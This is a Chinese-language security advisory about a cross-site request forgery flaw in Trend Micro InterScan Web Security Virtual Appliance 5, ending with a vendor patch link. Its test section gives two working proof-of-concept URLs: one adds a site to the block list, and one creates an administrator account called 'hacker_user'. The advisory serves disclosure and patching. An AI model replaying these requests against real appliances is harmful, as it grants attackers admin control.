受影响系统:
Trend Micro InterScan Web Security Virtual Appliance 5
描述:
InterScan Web Security Virtual Appliance是一款能安装在VMware平台上的网页过滤产品。
InterScan Web Security Virtual Appliance代理服务器允许用户通过HTTP/HTTPs请求执行某些操作,如添加删除用户、添加删除可信任站点等。由于没有对请求执行任何有效性检查,用户登录到代理服务器后访问不可信任站点就会导致跨站请求伪造攻击,导致以该用户的权限执行各种非授权操作。
<*来源:Eric BEAULIEU (eric.beaulieu@zebux.org)
链接:http://zebux.free.fr/index.php?option=com_content&view=article&id=555:interscan-web-security-virtual-appliance-cross-site-request-forgery&catid=16:sritnformatique&I temid=40
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
将站点添加到阻断列表:
http://[IWSVA_Server]:1812/servlet/com.trend.iwss.gui.servlet.urllistset?op=urlblock&fromurl=%
2Furlblocking.jsp&daemonaction=2&urlb_enable_view=on&URL_blocking__enable=yes&oldurlbscan=yes&url_input=&url_type=website&importedfile=&blocklist=www.shinke
n-monitoring.org*
添加新的管理员账号:
http://[IWSVA_Server]:1812/login_account_add_modify.jsp?
op=add&userid=hacker_user&password_changed=true&PASS1=mypassword&PASS2=mypassword&desc=My_Hacker_user_account&access_rights=admin
建议:
厂商补丁:
Trend Micro
———–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=250®s=NABU&lang_loc=1
0 条评论。